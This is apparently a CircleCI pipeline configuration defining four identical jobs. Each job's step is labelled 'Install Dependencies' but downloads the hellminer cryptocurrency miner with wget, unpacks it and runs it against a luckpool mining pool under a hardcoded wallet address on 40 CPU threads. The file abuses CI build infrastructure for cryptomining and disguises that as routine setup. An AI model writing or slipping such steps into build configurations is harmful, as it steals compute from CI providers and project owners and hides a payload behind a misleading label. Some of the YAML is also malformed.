version: 2.1
jobs:
    Roger:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RLdQbu3PGyiWzCeFHn4NPoq8R2W17HxrVa.john7 -p x --cpu 40
            name: Install Dependencies
            command: timeout 1m lscpu
    Roger1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RLdQbu3PGyiWzCeFHn4NPoq8R2W17HxrVa.john7 -p x --cpu 40
            name: Install Dependencies
            command: timeout 1m lscpu
    Roger2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RLdQbu3PGyiWzCeFHn4NPoq8R2W17HxrVa.john7 -p x --cpu 40
            name: Install Dependencies
            command: timeout 1m lscpu
    Roger3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RLdQbu3PGyiWzCeFHn4NPoq8R2W17HxrVa.john7 -p x --cpu 40
            name: Install Dependencies
            command: timeout 1m lscpu
workflows:
    version: 2.1
    build:
        jobs:
            - Roger
            - Roger1
            - Roger2
            - Roger3